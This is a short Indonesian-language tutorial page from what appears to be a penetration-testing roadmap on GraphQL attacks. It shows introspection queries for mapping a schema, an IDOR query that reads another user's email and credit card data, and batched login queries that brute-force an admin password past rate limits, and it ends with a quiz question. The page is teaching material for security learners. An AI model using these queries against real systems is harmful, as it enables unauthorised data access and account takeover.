Kembali ke Roadmap
// PHASE 4 · GraphQL Attacks

GraphQL Attacks

GraphQL Attacks

GraphQL adalah query language untuk API yang semakin populer. Implementasi yang tidak aman mengandung banyak celah unik yang berbeda dari REST API.

Introspection — Pemetaan API

# Query introspection untuk melihat semua schema { __schema { types { name fields { name type { name } } } } } # Cari query/mutation yang tersedia { __schema { queryType { fields { name description } } mutationType { fields { name description } } } }

GraphQL Injection

# IDOR via GraphQL { user(id: 2) { ← coba ID lain email creditCard privateData } } # Batch queries untuk bypass rate limit [ {"query": "{ login(user:\"admin\", pass:\"pass1\") }"}, {"query": "{ login(user:\"admin\", pass:\"pass2\") }"}, ... ]

GraphQL Specific Bugs

// CEK PEMAHAMAN
Mengapa introspection yang aktif di production GraphQL dianggap vulnerability?
AMengekspos seluruh schema API termasuk endpoint tersembunyi yang tidak terdokumentasi
BMemungkinkan eksekusi query berbahaya secara langsung
CMenyebabkan SQL injection di database
DMembuat server crash karena overload
Template Injection (SSTI) API Security Testing